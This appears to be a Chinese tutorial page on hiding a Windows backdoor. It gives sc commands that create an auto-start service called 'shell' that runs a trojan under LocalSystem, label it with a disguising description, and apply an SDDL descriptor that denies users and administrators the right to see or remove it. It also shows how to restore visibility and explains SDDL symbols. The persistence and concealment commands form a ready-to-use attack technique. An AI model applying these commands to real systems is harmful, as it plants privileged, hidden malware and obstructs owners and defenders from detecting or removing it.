1.创建服务
sc create shell start= auto binPath= " 木马路径,或者要执行的命令" obj= LocalSystem
注: sc create shell:使用 Windows 自带sc命令创建一个名为shell的系统服务
start= auto:设置服务开机自动启动,系统重启后会自动运行后门脚本 注意:start=后面必须带一个空格是 sc 命令语法要求
obj= LocalSystem:指定服务运行身份为本地系统账户(最高系统权限),权限等同于 System,可以深度控制主机、绕过大部分权限限制

2.第二步,给服务添加描述进行伪装
sc description "shell" "自启动的木马服务"

3.隐藏服务
sc sdset shell "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
4.还原 通过删除拒绝相关的SDDL语句,即可让服务正常被查询
sc sdset shell "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
隐藏服务用到的是:SDDL
Windows服务支持使用安全描述符定义语言(Security Descriptor Definition Language | SDDL)控制服务权限的功能。通过修改SDDL可以修改对象(文件或者服务)的DACL(自主访问控制列表),从而修改用户对对象的访问控制。通过对服务的SDDL进行编辑,拒绝所有用户对该服务的读取权限,即实现服务隐藏的效果。
SDDL语法:
符号描述
O: – Owner
G: – Primary Group
D: – Discretionary ACL (DACL)
S: – System ACL (SACL)
ACE 类型描述
A: – Access Allowed
D: – Access Denied
OA: – Object Access Allowed
OD: – Object Access Denied
AU: – System Auidt
AL: – System Alarm
OU: – System Object Audit
OL: – System Object Alarm
ML: – System MAndatory Label
服务相关符号权限
CC:- 服务配置查询
LC: – 服务状态查询
SW: – SERVICE_ENUMERATE_DEPENDENTS
RP: – 服务启动
WP: – 服务停止
DT: – 服务暂停
DC: – 服务配置更改
SD: – 删除
继承标志位
OI:- 表示该ACE可以被子对象继承
CI:- 表示该ACE可以被子容器继承
IO:- 仅作用于子对象
NP:- 仅被直接子容器继承,不继续向下继承
对象
"IU":- 交互登陆用户
"AU":- 认证用户
"SU":- 服务登陆用户
网硕互联帮助中心





评论前必须登录!
注册